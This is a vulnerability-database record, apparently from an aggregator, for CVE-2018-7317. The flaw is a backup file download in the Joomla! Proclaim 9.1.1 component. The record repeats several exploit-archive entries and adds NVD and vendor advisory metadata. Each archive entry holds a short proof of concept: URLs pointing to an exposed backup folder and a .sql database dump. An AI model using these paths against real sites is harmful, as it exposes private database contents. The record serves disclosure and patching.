{"sourceData": "`# # # # \n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download \n# Dork: N/A \n# Date: 22.02.2018 \n# Vendor Homepage: https://www.christianwebministries.org/ \n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/ \n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip \n# Version: 9.1.1 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-7317 \n# # # # \n# Exploit Author: Ihsan Sencan \n# # # # \n# \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/media/com_biblestudy/backup/ \n# \n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql \n# \n# # # # \n \n`\n", "history": [], "description": "", "sourceHref": "https://packetstormsecurity.com/files/download/146546/joomlaproclaim911-disclsoe.txt", "reporter": "Ihsan Sencan", "href": "https://packetstormsecurity.com/files/146546/Joomla-Proclaim-9.1.1-Backup-Disclosure.html", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "848370fe98f132bc928e5f5eff731d90"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "6a05529796e77514ef90d4ebbf6a1c61"}, {"key": "modified", "hash": "1a942ab282c8ec2d7156eb2d11f2c2fa"}, {"key": "published", "hash": "1a942ab282c8ec2d7156eb2d11f2c2fa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8f9da6443571f75195f401f82e60b810"}, {"key": "sourceData", "hash": "8b4d712490a096969b4c6b425127bba4"}, {"key": "sourceHref", "hash": "174d2b0a009bbc2aa26d66f46fc57d90"}, {"key": "title", "hash": "92e33ac5ba29abb808c0bc582215be29"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "viewCount": 4, "references": [], "lastseen": "2018-02-24T00:58:03", "published": "2018-02-23T00:00:00", "objectVersion": "1.3", "cvelist": ["CVE-2018-7317"], "id": "PACKETSTORM:146546", "hash": "ea5269d2201b626a028c7df1c88030fc4e0f333b46f0e1d860236dd6237af36b", "modified": "2018-02-23T00:00:00", "title": "Joomla! Proclaim 9.1.1 Backup Disclosure", "edition": 1, "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 4.6, "vector": "NONE", "modified": "2018-02-24T00:58:03"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-7317"]}, {"type": "zdt", "idList": ["1337DAY-ID-29865"]}, {"type": "exploitdb", "idList": ["EDB-ID:44159"]}, {"type": "joomla", "idList": ["JVEL:569"]}], "modified": "2018-02-24T00:58:03"}, "vulnersScore": 4.6}}

{"cve": [{"lastseen": "2019-05-29T18:20:29", "bulletinFamily": "NVD", "description": "Backup Download exists in the Proclaim 9.1.1 component for Joomla! via a direct request for a .sql file under backup/.", "modified": "2018-03-13T15:12:00", "id": "CVE-2018-7317", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7317", "published": "2018-02-22T19:29:00", "title": "CVE-2018-7317", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-04-13T09:46:29", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-02-22T00:00:00", "published": "2018-02-22T00:00:00", "href": "https://0day.today/exploit/description/29865", "id": "1337DAY-ID-29865", "type": "zdt", "title": "Joomla Proclaim 9.1.1 Component - Backup File Download Vulnerability", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\r\n# Vendor Homepage: https://www.christianwebministries.org/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\r\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\r\n# Version: 9.1.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7317\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/media/com_biblestudy/backup/\r\n# \r\n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\r\n# \r\n# # # #\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/29865", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:23", "bulletinFamily": "exploit", "description": "\nJoomla! Component Proclaim 9.1.1 - Backup File Download", "modified": "2018-02-22T00:00:00", "published": "2018-02-22T00:00:00", "id": "EXPLOITPACK:B115ED933DE761EFA1CA7EE42C3A61CB", "href": "", "title": "Joomla! Component Proclaim 9.1.1 - Backup File Download", "type": "exploitpack", "sourceData": "# # # #\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\n# Dork: N/A\n# Date: 22.02.2018\n# Vendor Homepage: https://www.christianwebministries.org/\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\n# Version: 9.1.1\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-7317\n# # # #\n# Exploit Author: Ihsan Sencan\n# # # #\n# \n# POC: \n# \n# 1)\n# http://localhost/[PATH]/media/com_biblestudy/backup/\n# \n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\n# \n# # # #", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitdb": [{"lastseen": "2018-02-22T21:20:27", "bulletinFamily": "exploit", "description": "Joomla! Component Proclaim 9.1.1 - Backup File Download. CVE-2018-7317. Webapps exploit for PHP platform", "modified": "2018-02-22T00:00:00", "published": "2018-02-22T00:00:00", "id": "EDB-ID:44159", "href": "https://www.exploit-db.com/exploits/44159/", "type": "exploitdb", "title": "Joomla! Component Proclaim 9.1.1 - Backup File Download", "sourceData": "# # # #\r\n# Exploit Title: Joomla! Component Proclaim 9.1.1 - Backup Download\r\n# Dork: N/A\r\n# Date: 22.02.2018\r\n# Vendor Homepage: https://www.christianwebministries.org/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/living/religion/proclaim/\r\n# Software Download: https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases/download/v9.1.1/pkg_proclaim.zip\r\n# Version: 9.1.1\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-7317\r\n# # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # #\r\n# \r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/media/com_biblestudy/backup/\r\n# \r\n# http://localhost/[PATH]/media/com_biblestudy/backup/Joomla375_jbs-db-backup_2018_February_22_1518955684.sql\r\n# \r\n# # # #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44159/"}], "joomla": [{"lastseen": "2018-09-18T08:45:46", "bulletinFamily": "software", "description": "Proclaim from Christian Web Ministries (installs as com_biblestudy), versions 9.1.1 and previous, arbitrary file upload, also backup file download\n\nresolution: update to 9.1.2 fixes both issues\n\nupdate notice: <https://github.com/Joomla-Bible-Study/Joomla-Bible-Study/releases>\n", "modified": "2018-02-27T12:42:35", "published": "2018-02-27T00:00:00", "id": "JVEL:569", "href": "https://vel.joomla.org/vel-blog/2097", "type": "joomla", "title": "Proclaim, 9.1.1, Arbitrary File Upload", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}